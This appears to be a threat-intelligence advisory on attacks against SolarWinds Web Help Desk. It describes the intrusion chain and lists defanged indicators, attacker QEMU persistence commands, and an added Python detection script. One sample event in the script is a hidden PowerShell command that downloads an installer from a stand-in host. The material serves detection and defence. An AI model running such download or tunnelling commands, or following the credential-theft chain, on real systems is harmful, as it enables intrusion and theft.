Multiple Researchers Confirm Active Exploitation of SolarWinds Web Help Desk Instances - RH-ISAC

Posted on February 9, 2026 by Bradford Regeski, Cyber Threat Intelligence Analyst

Summary

Threat actors are actively exploiting critical vulnerabilities in internet-exposed SolarWinds Web Help Desk (WHD) instances to achieve unauthenticated remote code execution. These intrusions follow a high-impact pattern in which a single unpatched application serves as the gateway for lateral movement and full domain compromise. Once inside, attackers deploy a mix of legitimate remote monitoring and management (RMM) tools and purpose-built command-and-control frameworks to maintain persistent access. The specific vulnerabilities being exploited have not been conclusively identified: CVE-2025-40551 was recently added to CISA's Known Exploited Vulnerabilities (KEV) catalog, and CVE-2025-40536 and CVE-2025-26399 were recently discussed by Microsoft and other vendors that have also observed in-the-wild exploitation. Security teams are urged to upgrade any WHD instance running a version prior to 12.8.7 HF1 immediately and to monitor for unauthorized installations of administrative and remote-access tooling.

Technical Analysis

The exploit chain begins when the vulnerable WHD service wrapper spawns a Java process, which in turn launches PowerShell or cmd.exe to retrieve malicious payloads via BITS or msiexec. These payloads often include the Zoho ManageEngine RMM agent, which threat actors use for hands-on-keyboard reconnaissance of Active Directory environments. In several instances, attackers staged malicious MSI installers on the file-hosting services Catbox and Supabase and registered the agents to anonymous Proton Mail accounts. Persistence is frequently established through reverse SSH tunnels and scheduled tasks that launch QEMU virtual machines, hiding malicious traffic inside a guest that runs in the SYSTEM context.
To further evade detection, threat actors perform DLL sideloading by abusing wab.exe to load a malicious sspicli.dll, giving them direct access to LSASS memory for credential theft. Lateral movement follows textbook patterns, starting with domain computer enumeration and escalating to DCSync attacks that request password data directly from domain controllers. Defenders have also observed the deployment of Velociraptor, a legitimate forensics tool, repurposed as a command-and-control framework through customized configuration files pointing to Cloudflare Workers. Remediation requires the immediate isolation of compromised hosts, rotation of high-privilege service credentials, and thorough removal of unauthorized RMM artifacts such as TOOLSIQ.EXE.

Indicators of Compromise

Huntress provided the following indicators of compromise for review and ingestion related to the recent SolarWinds exploitation. Note that several of the files listed (the Velociraptor and cloudflared installers, the portable VS Code binary) are legitimate software; their hashes identify what the attackers staged, not malware in their own right, so treat them as context for the other indicators rather than as standalone blocks.

https[:]//files.catbox[.]moe/tmp9fc.msi
  SHA256: 897eae49e6c32de3f4bfa229ad4f2d6e56bcf7a39c6c962d02e5c85cd538a189
  Description: Zoho Meetings installer

https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
  SHA256: 46831be6e577e3120084ee992168cca5af2047d4a08e3fd67ecd90396393b751
  Description: Velociraptor installer

https[:]//auth.qgtxtebl.workers[.]dev/
  Description: Velociraptor server URL

https[:]//github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi
  Description: Cloudflared installer

https[:]//vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/code.txt
  Dropped as: C:\ProgramData\Microsoft\code.exe
  SHA256: 34b2a6c334813adb2cc70f5bd666c4afbdc4a6d8a58cc1c7a902b13bbd2381f4
  Description: Portable version of VS Code

https[:]//62c4cbb992274c32922cfbb49d623bd1.us-central1.gcp.cloud.es[.]io
  Description: Elasticsearch URL

esmahyft@proton[.]me
  Description: Zoho Assist account email

v2-api.mooo[.]com
  Description: Velociraptor failover domain

client.config[.]yaml
  SHA256: bbd6e120bf55309141f75c85cc94455b1337a1a4333f6868b245b2edfa97ef44
  Description: Velociraptor config file

Task Path: C:\Windows\System32\Tasks\TPMProfiler
  Command: C:\Users\[user]\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22
  Description: Scheduled task (persistence)

Task Path: C:\Windows\System32\Tasks\TPMProfiler
  Command: C[:]\Users\[user]\local\qemu-system-x86_64 -m 1G -smp 1 -hda bisrv.dll -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::32567-:22
  Description: Scheduled task (persistence)
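The process chain, the wab.exe sideload, the QEMU scheduled-task persistence and the Velociraptor configuration described in the Technical Analysis above, turned into detection checks as an added example (this is not code from Huntress, RH-ISAC or SolarWinds). It runs over a few constructed process-creation and image-load events shaped like Sysmon Event ID 1 and 7 fields; the WHD install directory, the sample paths and command lines, and the Velociraptor server hosts are assumptions for illustration, not the article's indicators.

```python
"""Detection checks for the WHD post-exploitation chain described in the article.

Added example, not code from Huntress, RH-ISAC or SolarWinds. Every path, command
line and URL in the sample data is constructed for illustration.
"""
import re

WHD_DIR_HINT = "webhelpdesk"  # assumed substring of the WHD install path; adjust locally
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Payload retrieval methods the article reports: BITS (bitsadmin / Start-BitsTransfer), msiexec.
PAYLOAD_FETCH = re.compile(r"(?i)\b(bitsadmin|start-bitstransfer|msiexec)\b")
# QEMU user-mode networking forwarding a host port to the guest's SSH port.
QEMU_SSH_FWD = re.compile(r"(?i)hostfwd=tcp::(\d+)-:22\b")
QEMU_DISK = re.compile(r"(?i)-hda\s+(\S+)")

SAMPLE_EVENTS = [  # constructed telemetry: id 1 = process creation, id 7 = image load
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
     "command_line": "powershell.exe -nop -w hidden Start-BitsTransfer -Source "
                     "https://files.example.invalid/tmp9fc.msi -Destination C:\\Windows\\Temp\\u.msi"},
    {"id": 7, "image": r"C:\Users\Public\wab.exe", "image_loaded": r"C:\Users\Public\sspicli.dll"},
    {"id": 7, "image": r"C:\Program Files\Windows Mail\wab.exe",  # benign: system copy of the DLL
     "image_loaded": r"C:\Windows\System32\sspicli.dll"},
    {"id": 1, "image": r"C:\Users\alice\tmp\qemu-system-x86_64.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",  # scheduled task launches via svchost
     "command_line": "qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 "
                     "-netdev user,id=net0,hostfwd=tcp::22022-:22"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # benign
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "powershell.exe Get-Process"},
]


def _base(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dir(path):
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def detect_whd_shell_spawn(ev):
    """WHD's Java process spawning a shell; escalate if the shell fetches payloads via BITS/msiexec."""
    if ev["id"] != 1 or _base(ev["image"]) not in SHELLS:
        return None
    parent = ev["parent_image"]
    if _base(parent) != "java.exe" or WHD_DIR_HINT not in parent.lower():
        return None
    severity = "high" if PAYLOAD_FETCH.search(ev["command_line"]) else "medium"
    return ("whd_java_spawned_shell", severity, ev["command_line"])


def detect_wab_sideload(ev):
    """wab.exe loading sspicli.dll from anywhere other than the Windows system directories."""
    if ev["id"] != 7 or _base(ev["image"]) != "wab.exe" or _base(ev["image_loaded"]) != "sspicli.dll":
        return None
    module_dir = _dir(ev["image_loaded"])
    if module_dir.endswith("\\windows\\system32") or module_dir.endswith("\\windows\\syswow64"):
        return None
    return ("wab_sspicli_sideload", "critical", ev["image_loaded"])


def detect_qemu_ssh_tunnel(ev):
    """A QEMU guest exposing its SSH port on the host: the reverse-tunnel persistence pattern."""
    if ev["id"] != 1 or "qemu-system" not in _base(ev["image"]):
        return None
    fwd = QEMU_SSH_FWD.search(ev["command_line"])
    if not fwd:
        return None
    disk = QEMU_DISK.search(ev["command_line"])
    detail = f"host port {fwd.group(1)} -> guest 22, disk image {disk.group(1) if disk else '?'}"
    return ("qemu_reverse_ssh_vm", "high", detail)


RULES = (detect_whd_shell_spawn, detect_wab_sideload, detect_qemu_ssh_tunnel)


def run_detections(events):
    """Return (rule, severity, detail) tuples for every event that trips a rule."""
    return [f for ev in events for f in (rule(ev) for rule in RULES) if f]


# Minimal Velociraptor client.config.yaml; hosts are constructed, not the article's IOCs.
SAMPLE_CLIENT_CONFIG = """\
Client:
  server_urls:
  - https://auth.example-worker.workers.dev/
  - https://v2-api.example.invalid/
  ca_certificate: |
    -----BEGIN CERTIFICATE-----
"""


def velociraptor_server_urls(config_text):
    """Pull the server_urls list from a client config with a line scan (no YAML dependency)."""
    urls, in_block = [], False
    for line in config_text.splitlines():
        s = line.strip()
        if s.startswith("server_urls:"):
            in_block = True
        elif in_block and s.startswith("- "):
            urls.append(s[2:].strip())
        elif in_block and s and not s.startswith("#"):
            in_block = False  # next key ends the list
    return urls


def flag_unapproved_servers(config_text, approved_hosts):
    """Any Velociraptor server host outside the organisation's own deployment is a C2 candidate."""
    unapproved = []
    for url in velociraptor_server_urls(config_text):
        host = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0].lower()
        if host not in approved_hosts:
            unapproved.append(url)
    return unapproved


if __name__ == "__main__":
    for finding in run_detections(SAMPLE_EVENTS):
        print(finding)
    print(flag_unapproved_servers(SAMPLE_CLIENT_CONFIG, {"velociraptor.corp.example"}))
```

The wab.exe rule keys on where sspicli.dll is loaded from rather than on a hash, since the sideloaded DLL will differ between intrusions; the Velociraptor check compares server hosts against the organisation's own deployment rather than against workers.dev alone, because the failover domain in the IOC list shows the operators use more than one provider.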
